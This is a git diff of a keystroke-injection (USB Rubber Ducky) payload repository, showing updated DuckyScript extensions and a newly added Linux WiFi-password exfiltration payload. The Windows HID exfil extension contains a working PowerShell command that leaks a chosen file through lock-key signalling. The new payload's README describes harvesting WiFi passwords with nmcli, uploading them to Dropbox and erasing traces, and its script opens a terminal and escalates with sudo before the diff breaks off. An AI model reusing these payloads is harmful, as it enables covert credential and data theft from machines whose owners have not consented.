STRING caps led on
|
STRING caps led on
|
||||||
ENTER
|
ENTER
|
||||||
STRING prediction: iOS
|
STRING prediction: iOS
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
$_OS = IOS
|
$_OS = IOS
|
||||||
ELSE
|
ELSE
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING no caps reply
|
STRING no caps reply
|
||||||
ENTER
|
ENTER
|
||||||
STRING prediction: MacOS
|
STRING prediction: MacOS
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
$_OS = MACOS
|
$_OS = MACOS
|
||||||
END_IF
|
END_IF
|
||||||
ELSE IF ($_OS == WINDOWS) THEN
|
ELSE IF ($_OS == WINDOWS) THEN
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING Confident Windows Prediction
|
STRING Confident Windows Prediction
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
$_OS = WINDOWS
|
$_OS = WINDOWS
|
||||||
END_IF
|
END_IF
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
|
|
||||||
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
|
||||||
IF VERBOSE THEN
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
ENTER
|
ENTER
|
||||||
STRING OS_DETECT complete
|
STRING OS_DETECT complete
|
||||||
ENTER
|
ENTER
|
||||||
END_IF
|
END_IF_DEFINED
|
||||||
END_FUNCTION
|
END_FUNCTION
|
||||||
|
|
||||||
REM Uncomment the function call below to run this extension inline (here)
|
REM Uncomment the function call below to run this extension inline (here)
|
||||||
REM or call DETECT_OS() anywhere in your payload after the extension
|
REM or call DETECT_OS() anywhere in your payload after the extension
|
||||||
|
|
||||||
REM DETECT_OS()
|
REM DETECT_OS()
|
||||||
END_EXTENSION
|
END_EXTENSION
|
||||||
|
|
|
@ -1,21 +1,24 @@
|
||||||
EXTENSION PASSIVE_DETECT_READY
|
EXTENSION PASSIVE_DETECT_READY
|
||||||
REM VERSION 1.0
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM Passive Detect Ready - no injection dynamic boot delay
|
REM_BLOCK DOCUMENTATION
|
||||||
REM for hosts that reflect current OS lock key state on connect
|
Passive Detect Ready - no injection dynamic boot delay
|
||||||
|
for hosts that reflect current OS lock key state on connect
|
||||||
|
|
||||||
REM USAGE:
|
USAGE:
|
||||||
REM Extension runs inline (here)
|
Extension runs inline (here)
|
||||||
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
REM boot delay
|
boot delay
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM CONFIGURATION:
|
REM CONFIGURATION:
|
||||||
DEFINE MAX_WAIT 150
|
DEFINE #MAX_WAIT 150
|
||||||
DEFINE CHECK_INTERVAL 20
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
|
||||||
VAR $MAX_TRIES = MAX_WAIT
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
DELAY CHECK_INTERVAL
|
DELAY #CHECK_INTERVAL
|
||||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
END_WHILE
|
END_WHILE
|
||||||
END_EXTENSION
|
END_EXTENSION
|
||||||
|
|
|
@ -1,37 +1,42 @@
|
||||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
REM VERSION 1.0
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM Windows fully passive OS Detection and passive Detect Ready
|
REM_BLOCK DOCUMENTATION
|
||||||
REM Includes its own passive detect ready. Does not require
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
REM additional extensions
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
REM USAGE:
|
USAGE:
|
||||||
REM Extension runs inline (here)
|
Extension runs inline (here)
|
||||||
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
REM boot delay
|
boot delay
|
||||||
REM $_OS will be set to WINDOWS or NOT_WINDOWS
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM CONFIGURATION:
|
REM CONFIGURATION:
|
||||||
DEFINE MAX_WAIT 150
|
DEFINE #MAX_WAIT 150
|
||||||
DEFINE CHECK_INTERVAL 20
|
DEFINE #CHECK_INTERVAL 20
|
||||||
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
DEFINE NOT_WINDOWS 7
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
VAR $MAX_TRIES = MAX_WAIT
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
DELAY CHECK_INTERVAL
|
DELAY #CHECK_INTERVAL
|
||||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
END_WHILE
|
END_WHILE
|
||||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
$_OS = WINDOWS
|
$_OS = WINDOWS
|
||||||
ELSE
|
|
||||||
$_OS = NOT_WINDOWS
|
|
||||||
END_IF
|
END_IF
|
||||||
|
|
||||||
REM EXAMPLE USAGE AFTER EXTENSION
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
REM IF ($_OS == WINDOWS) THEN
|
IF ($_OS == WINDOWS) THEN
|
||||||
REM STRING HELLO WINDOWS!
|
STRING HELLO WINDOWS!
|
||||||
REM ELSE
|
ELSE
|
||||||
REM STRING HELLO WORLD!
|
STRING HELLO WORLD!
|
||||||
REM END_IF
|
END_IF
|
||||||
|
END_REM
|
||||||
END_EXTENSION
|
END_EXTENSION
|
||||||
|
|
|
@ -1,38 +1,62 @@
|
||||||
EXTENSION PROTECTED_STORAGE_MODE
|
EXTENSION PROTECTED_STORAGE_MODE
|
||||||
REM VERSION 1.0
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM Example hidden storage mode
|
REM_BLOCK
|
||||||
REM Forces user to padlock style unlock storage mode by setting
|
Example hidden storage mode
|
||||||
REM the HOSTs lock keys and pressing the duck button to submit a
|
Forces user to padlock style unlock storage mode by setting
|
||||||
REM combination three times.
|
the HOSTs lock keys and pressing the duck button to submit a
|
||||||
REM The wrong combination will immediately fail silently.
|
combination three times.
|
||||||
REM The correct combination will trigger ATTACKMODE STORAGE and LED_G
|
The wrong combination will immediately fail silently.
|
||||||
|
The correct combination will trigger ATTACKMODE STORAGE and LED_G
|
||||||
|
|
||||||
REM TARGET:
|
TARGET:
|
||||||
REM Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK
|
Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK
|
||||||
|
|
||||||
REM USAGE:
|
USAGE:
|
||||||
REM BUTTON_DEF
|
BUTTON_DEF
|
||||||
REM STORAGE_PASSWORD_CHECK()
|
STORAGE_PASSWORD_CHECK()
|
||||||
REM END_BUTTON
|
END_BUTTON
|
||||||
|
|
||||||
|
CONFIGURATION:
|
||||||
|
Available combinations provided as DEFINEs below,
|
||||||
|
change within the STORAGE_PASSWORD_CHECK as desired
|
||||||
|
|
||||||
|
Method of input submission can be changed using SUBMIT_FOR_CHECK
|
||||||
|
But will obviously convolute combination checks.
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM Combinations provided as defines for convenience (verbosely spaced - DEFINES aren't re-formatted by preprocessor)
|
||||||
|
DEFINE #ALL_LOCKS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )
|
||||||
|
DEFINE #ALL_LOCKS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
|
||||||
|
|
||||||
|
DEFINE #ONLY_CAPS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )
|
||||||
|
DEFINE #ONLY_NUM_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
|
||||||
|
DEFINE #ONLY_SCROLL_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )
|
||||||
|
|
||||||
|
DEFINE #ONLY_CAPS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == TRUE ) )
|
||||||
|
DEFINE #ONLY_NUM_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )
|
||||||
|
DEFINE #ONLY_SCROLL_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
|
||||||
|
|
||||||
|
DEFINE #SUBMIT_FOR_CHECK WAIT_FOR_BUTTON_PRESS
|
||||||
|
|
||||||
FUNCTION STORAGE_PASSWORD_CHECK()
|
FUNCTION STORAGE_PASSWORD_CHECK()
|
||||||
VAR $ACCEPED = FALSE
|
VAR $ACCEPED = FALSE
|
||||||
LED_R
|
LED_R
|
||||||
WAIT_FOR_BUTTON_PRESS
|
#SUBMIT_FOR_CHECK
|
||||||
|
|
||||||
REM first combination ALL LOCKS OFF
|
REM first combination ALL LOCKS OFF
|
||||||
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN
|
IF #ALL_LOCKS_OFF THEN
|
||||||
STRING .
|
STRING .
|
||||||
WAIT_FOR_BUTTON_PRESS
|
#SUBMIT_FOR_CHECK
|
||||||
|
|
||||||
REM second combination ONLY CAPS ON
|
REM second combination ONLY CAPS ON
|
||||||
IF (($_CAPSLOCK_ON == TRUE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN
|
IF #ONLY_CAPS_ON THEN
|
||||||
STRING .
|
STRING .
|
||||||
WAIT_FOR_BUTTON_PRESS
|
#SUBMIT_FOR_CHECK
|
||||||
|
|
||||||
REM third combination ONLY NUM ON
|
REM third combination ONLY NUM ON
|
||||||
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE)) THEN
|
IF #ONLY_NUM_ON THEN
|
||||||
$ACCEPTED = TRUE
|
$ACCEPTED = TRUE
|
||||||
END_IF
|
END_IF
|
||||||
END_IF
|
END_IF
|
||||||
|
|
|
@ -1,41 +1,52 @@
|
||||||
EXTENSION TRANSLATE
|
EXTENSION TRANSLATE
|
||||||
REM VERSION 1.0
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM This extension acts as a library or collection of helper functions
|
REM_BLOCK DOCUMENTATION
|
||||||
REM to work with converting variables in your payloads.
|
This extension acts as a library or collection of helper functions
|
||||||
REM WHY:
|
to work with converting variables in your payloads.
|
||||||
REM Of the many ways to get information about the state of your payload
|
WHY:
|
||||||
REM is by injecting static strings effectively as debugging prints
|
Of the many ways to get information about the state of your payload
|
||||||
REM However, given the non-static nature of payloads using variables in
|
is by injecting static strings effectively as debugging prints
|
||||||
REM DuckyScript 3.0 - the ability to decode variables during payload
|
However, given the non-static nature of payloads using variables in
|
||||||
REM execution and print (inject) representations of their current state
|
DuckyScript 3.0 - the ability to decode variables during payload
|
||||||
REM can often be a critically helpful development and debugging tool.
|
execution and print (inject) representations of their current state
|
||||||
|
can often be a critically helpful development and debugging tool.
|
||||||
|
|
||||||
REM Available Functions:
|
Available Functions:
|
||||||
REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
|
DEFAULT:
|
||||||
REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
|
TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
|
||||||
REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
|
EXTENDED: (enabled using the #INCLUDE defines below):
|
||||||
REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
|
TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
|
||||||
|
TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
|
||||||
|
TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
|
||||||
|
|
||||||
REM USAGE:
|
USAGE:
|
||||||
REM set $INPUT to desired var
|
set $INPUT to desired var
|
||||||
REM call the correct translate_ function for the expected data type e.g.
|
call the correct translate_ function for the expected data type e.g.
|
||||||
REM VAR $myVar = 1234
|
VAR $myVar = 1234
|
||||||
REM $INPUT = $myVar
|
$INPUT = $myVar
|
||||||
REM TRANSLATE_INT()
|
TRANSLATE_INT()
|
||||||
REM REM the above code will inject 1234
|
REM the above code will inject 1234
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM begin extension variables
|
REM CONFIGURATION:
|
||||||
DEFINE PRINT_INT 0
|
DEFINE #INCLUDE_TRANSLATE_HEX FALSE
|
||||||
DEFINE PRINT_HEX 1
|
DEFINE #INCLUDE_TRANSLATE_BOOL FALSE
|
||||||
VAR $DIGIT_PRINT_MODE = PRINT_INT
|
DEFINE #INCLUDE_TRANSLATE_BINARY FALSE
|
||||||
|
DEFINE #INCLUDE_SWAP_ENDIAN FALSE
|
||||||
|
|
||||||
|
REM Append ENTER after translation
|
||||||
|
VAR $AS_STRINGLN = TRUE
|
||||||
|
|
||||||
|
DEFINE #PRINT_INT 0
|
||||||
|
DEFINE #PRINT_HEX 1
|
||||||
|
VAR $DIGIT_PRINT_MODE = #PRINT_INT
|
||||||
VAR $D = 0
|
VAR $D = 0
|
||||||
VAR $IN = 0
|
VAR $IN = 0
|
||||||
VAR $INPUT = 0
|
VAR $INPUT = 0
|
||||||
VAR $MOD = 0
|
VAR $MOD = 0
|
||||||
VAR $P = FALSE
|
VAR $P = FALSE
|
||||||
VAR $NL = TRUE
|
|
||||||
REM end extension variables
|
|
||||||
|
|
||||||
REM REQUIRED for INT/HEX - convert int to char
|
REM REQUIRED for INT/HEX - convert int to char
|
||||||
FUNCTION PRINTDIGIT()
|
FUNCTION PRINTDIGIT()
|
||||||
|
@ -59,7 +70,8 @@ EXTENSION TRANSLATE
|
||||||
STRING 8
|
STRING 8
|
||||||
ELSE IF ($D == 9) THEN
|
ELSE IF ($D == 9) THEN
|
||||||
STRING 9
|
STRING 9
|
||||||
ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN
|
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX
|
||||||
|
ELSE IF ($DIGIT_PRINT_MODE == #PRINT_HEX) THEN
|
||||||
IF ($D == 10) THEN
|
IF ($D == 10) THEN
|
||||||
STRING A
|
STRING A
|
||||||
ELSE IF ($D == 11) THEN
|
ELSE IF ($D == 11) THEN
|
||||||
|
@ -73,6 +85,7 @@ EXTENSION TRANSLATE
|
||||||
ELSE IF ($D == 15) THEN
|
ELSE IF ($D == 15) THEN
|
||||||
STRING F
|
STRING F
|
||||||
END_IF
|
END_IF
|
||||||
|
END_IF_DEFINED
|
||||||
ELSE
|
ELSE
|
||||||
STRING ?
|
STRING ?
|
||||||
END_IF
|
END_IF
|
||||||
|
@ -91,15 +104,18 @@ EXTENSION TRANSLATE
|
||||||
END_IF
|
END_IF
|
||||||
END_FUNCTION
|
END_FUNCTION
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #INCLUDE_SWAP_ENDIAN
|
||||||
REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
|
REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
|
||||||
FUNCTION SWAP_ENDIAN()
|
FUNCTION SWAP_ENDIAN()
|
||||||
$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
|
$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
|
||||||
END_FUNCTION
|
END_FUNCTION
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
|
|
||||||
REM Translates a variable of presumed integer type and attempts to convert
|
REM Translates a variable of presumed integer type and attempts to convert
|
||||||
REM and inject a DECIMAL string representation
|
REM and inject a DECIMAL string representation
|
||||||
FUNCTION TRANSLATE_INT()
|
FUNCTION TRANSLATE_INT()
|
||||||
$DIGIT_PRINT_MODE = PRINT_INT
|
$DIGIT_PRINT_MODE = #PRINT_INT
|
||||||
$P = FALSE
|
$P = FALSE
|
||||||
IF ( $INPUT >= 10000) THEN
|
IF ( $INPUT >= 10000) THEN
|
||||||
$MOD = 10000
|
$MOD = 10000
|
||||||
|
@ -119,28 +135,33 @@ EXTENSION TRANSLATE
|
||||||
END_IF()
|
END_IF()
|
||||||
$D = $INPUT
|
$D = $INPUT
|
||||||
PRINTDIGIT()
|
PRINTDIGIT()
|
||||||
IF $NL THEN
|
IF $AS_STRINGLN THEN
|
||||||
ENTER
|
ENTER
|
||||||
END_IF
|
END_IF
|
||||||
END_FUNCTION
|
END_FUNCTION
|
||||||
|
|
||||||
REM Translates a variable of presumed boolean type and attempts to convert
|
REM Translates a variable of presumed boolean type and attempts to convert
|
||||||
REM and inject a BOOLEAN string representation
|
REM and inject a BOOLEAN string representation
|
||||||
|
REM TO ENABLE SET INCLUDE_TRANSLATE_BOOL to TRUE before compiling
|
||||||
|
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BOOL
|
||||||
FUNCTION TRANSLATE_BOOL()
|
FUNCTION TRANSLATE_BOOL()
|
||||||
IF $INPUT THEN
|
IF $INPUT THEN
|
||||||
STRING TRUE
|
STRING TRUE
|
||||||
ELSE
|
ELSE
|
||||||
STRING FALSE
|
STRING FALSE
|
||||||
END_IF
|
END_IF
|
||||||
IF $NL THEN
|
IF $AS_STRINGLN THEN
|
||||||
ENTER
|
ENTER
|
||||||
END_IF
|
END_IF
|
||||||
END_FUNCTION
|
END_FUNCTION
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
REM Translates a variable of presumed integer type and attempts to convert
|
REM Translates a variable of presumed integer type and attempts to convert
|
||||||
REM and inject a HEX string representation
|
REM and inject a HEX string representation
|
||||||
|
REM TO ENABLE SET INCLUDE_TRANSLATE_HEX to TRUE before compiling
|
||||||
|
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX
|
||||||
FUNCTION TRANSLATE_HEX()
|
FUNCTION TRANSLATE_HEX()
|
||||||
$DIGIT_PRINT_MODE = PRINT_HEX
|
$DIGIT_PRINT_MODE = #PRINT_HEX
|
||||||
VAR $chars = 0
|
VAR $chars = 0
|
||||||
VAR $d1 = 0
|
VAR $d1 = 0
|
||||||
VAR $d2 = 0
|
VAR $d2 = 0
|
||||||
|
@ -192,13 +213,16 @@ EXTENSION TRANSLATE
|
||||||
$D = $d1
|
$D = $d1
|
||||||
PRINTDIGIT()
|
PRINTDIGIT()
|
||||||
END_IF
|
END_IF
|
||||||
IF $NL THEN
|
IF $AS_STRINGLN THEN
|
||||||
ENTER
|
ENTER
|
||||||
END_IF
|
END_IF
|
||||||
END_FUNCTION
|
END_FUNCTION
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
REM Translates a variable of presumed integer type and attempts to convert
|
REM Translates a variable of presumed integer type and attempts to convert
|
||||||
REM and inject a BINARY string representation
|
REM and inject a BINARY string representation
|
||||||
|
REM TO ENABLE SET INCLUDE_TRANSLATE_BINARY to TRUE before compiling
|
||||||
|
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BINARY
|
||||||
FUNCTION TRANSLATE_BINARY()
|
FUNCTION TRANSLATE_BINARY()
|
||||||
VAR $I = 16
|
VAR $I = 16
|
||||||
WHILE ( $I > 0 )
|
WHILE ( $I > 0 )
|
||||||
|
@ -210,8 +234,9 @@ EXTENSION TRANSLATE
|
||||||
END_IF
|
END_IF
|
||||||
$INPUT = ($INPUT << 1)
|
$INPUT = ($INPUT << 1)
|
||||||
END_WHILE
|
END_WHILE
|
||||||
IF $NL THEN
|
IF $AS_STRINGLN THEN
|
||||||
ENTER
|
ENTER
|
||||||
END_IF
|
END_IF
|
||||||
END_FUNCTION
|
END_FUNCTION
|
||||||
|
END_IF_DEFINED
|
||||||
END_EXTENSION
|
END_EXTENSION
|
||||||
|
|
|
@ -1,51 +1,91 @@
|
||||||
EXTENSION WINDOWS_HID_EXFIL
|
EXTENSION WINDOWS_HID_EXFIL
|
||||||
REM VERSION 1.0
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM Helpers for Keystroke Reflection data exfiltration
|
REM_BLOCK DOCUMENTATION
|
||||||
REM This payload is a proof of concept for USB HID only Data Exfiltration
|
Helpers for Keystroke Reflection data exfiltration
|
||||||
|
This payload is a proof of concept for USB HID only Data Exfiltration
|
||||||
|
|
||||||
REM TARGET:
|
TARGET:
|
||||||
REM Windows Hostthat supports powershell and SendKeys
|
Windows Host that supports powershell and SendKeys
|
||||||
|
|
||||||
REM USAGE:
|
USAGE:
|
||||||
REM Uncomment the function call below to run this extension inline
|
Prepare data to exfil (in filename defined by TARGET_FILE below)
|
||||||
REM or call RUN_EXFIL() anywhere in your payload after the extension
|
with a powershell window already open - call RUN_WINDOWS_EXFIL()
|
||||||
|
|
||||||
REM DEPLOYMENT:
|
DEPLOYMENT:
|
||||||
REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
|
Plug Ducky into host, wait for the LED to turn (and stay) solid green.
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM CONFIGURATION:
|
REM CONFIGURATION:
|
||||||
REM File on host machine to exfil using Keystroke Reflection attack
|
REM File on host machine to exfil
|
||||||
DEFINE TARGET_FILE filename.txt
|
DEFINE #TARGET_FILE filename.txt
|
||||||
|
|
||||||
|
DEFINE #SAVE_AND_RESTORE_LOCKS TRUE
|
||||||
|
DEFINE #ENABLE_EXFIL_LEDS TRUE
|
||||||
|
DEFINE #CLOSE_AFTER_EXFIL TRUE
|
||||||
|
|
||||||
|
DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE
|
||||||
|
|
||||||
FUNCTION RUN_WINDOWS_EXFIL()
|
FUNCTION RUN_WINDOWS_EXFIL()
|
||||||
REM Boot
|
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
|
||||||
LED_OFF
|
|
||||||
DELAY 500
|
|
||||||
REM Launch Windows RUN dialog
|
|
||||||
GUI r
|
|
||||||
DELAY 50
|
|
||||||
REM Launch powershell
|
|
||||||
STRING powershell
|
|
||||||
ENTER
|
|
||||||
DELAY 250
|
|
||||||
REM Save HOSTs current lock state
|
|
||||||
SAVE_HOST_KEYBOARD_LOCK_STATE
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
REM Start Listening - Enable EXFIL mode, Enable EXFIL mode for Device LEDS
|
END_IF_DEFINED
|
||||||
$_EXFIL_MODE_ENABLED = TRUE
|
|
||||||
|
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
|
||||||
|
LED_OFF
|
||||||
$_EXFIL_LEDS_ENABLED = TRUE
|
$_EXFIL_LEDS_ENABLED = TRUE
|
||||||
REM Convert and reflect target file
|
END_IF_DEFINED
|
||||||
STRING foreach($b in $(Get-Content "TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit;
|
|
||||||
|
$_EXFIL_MODE_ENABLED = TRUE
|
||||||
|
STRING_POWERSHELL
|
||||||
|
foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
|
||||||
|
foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
|
||||||
|
If($b -band $a){
|
||||||
|
$o+="%{NUMLOCK}"
|
||||||
|
}Else{
|
||||||
|
$o+="%{CAPSLOCK}"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
};
|
||||||
|
$o+="%{SCROLLLOCK}";
|
||||||
|
Add-Type -Assembly System.Windows.Forms;
|
||||||
|
[System.Windows.Forms.SendKeys]::SendWait("$o");
|
||||||
|
exit;
|
||||||
|
END_STRING
|
||||||
|
IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL
|
||||||
|
STRING exit;
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
REM Listen for EOF
|
REM Listen for EOF
|
||||||
WAIT_FOR_SCROLL_CHANGE
|
WAIT_FOR_SCROLL_CHANGE
|
||||||
REM Indicate SUCCESS on Device LED, Disable EXFIL mode
|
|
||||||
LED_G
|
|
||||||
$_EXFIL_MODE_ENABLED = FALSE
|
$_EXFIL_MODE_ENABLED = FALSE
|
||||||
REM Restore HOSTs lock state to original
|
|
||||||
|
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
|
||||||
|
LED_G
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
|
||||||
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
END_IF_DEFINED
|
||||||
END_FUNCTION
|
END_FUNCTION
|
||||||
|
|
||||||
REM Uncomment the function call below to run this extension inline (here)
|
IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO
|
||||||
REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension
|
REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.
|
||||||
REM RUN_WINDOWS_EXFIL()
|
REM DEMO Boot Delay
|
||||||
|
DELAY 3000
|
||||||
|
REM Open run dialog
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
REM Open Powershell
|
||||||
|
STRINGLN powershell
|
||||||
|
DELAY 500
|
||||||
|
REM Prepare some data in TARGET_FILE
|
||||||
|
STRINGLN echo test123 > #TARGET_FILE
|
||||||
|
DELAY 500
|
||||||
|
REM Exfil data to USB Rubber Ducky using Keystroke Reflection
|
||||||
|
RUN_WINDOWS_EXFIL()
|
||||||
|
END_IF_DEFINED
|
||||||
END_EXTENSION
|
END_EXTENSION
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
|
||||||
|
# Exfiltrate WiFi Passwords - Linux ✅
|
||||||
|
|
||||||
|
A script used to exfiltrate the wifi passwords on a Linux machine.
|
||||||
|
|
||||||
|
**Category**: Exfiltrate, Credentials, Execution
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to exfiltrate the wifi passwords on a Linux machine.
|
||||||
|
|
||||||
|
Opens a shell, get the WiFi names, get the passwords using nmcli, send the result to Dropbox, erase traces.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* Internet Connection
|
||||||
|
* Dropbox Token
|
||||||
|
* Permissions
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the Dropbox token
|
||||||
|
* Set the sudo password
|
|
@ -0,0 +1,128 @@
|
||||||
|
|
||||||
|
REM #######################################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Exfiltrate Wifi Passwords - Linux |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Exfiltration, Credentials, Execution |
|
||||||
|
REM # Target : Linux |
|
||||||
|
REM # |
|
||||||
|
REM #######################################################
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Permissions
|
||||||
|
REM - Internet connection
|
||||||
|
REM - Dropbox Token
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### PREREQUISITES SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
REM Required: You need to know the sudo password and replace 'example' with this
|
||||||
|
DEFINE SUDO_PASS example
|
||||||
|
STRING sudo su
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
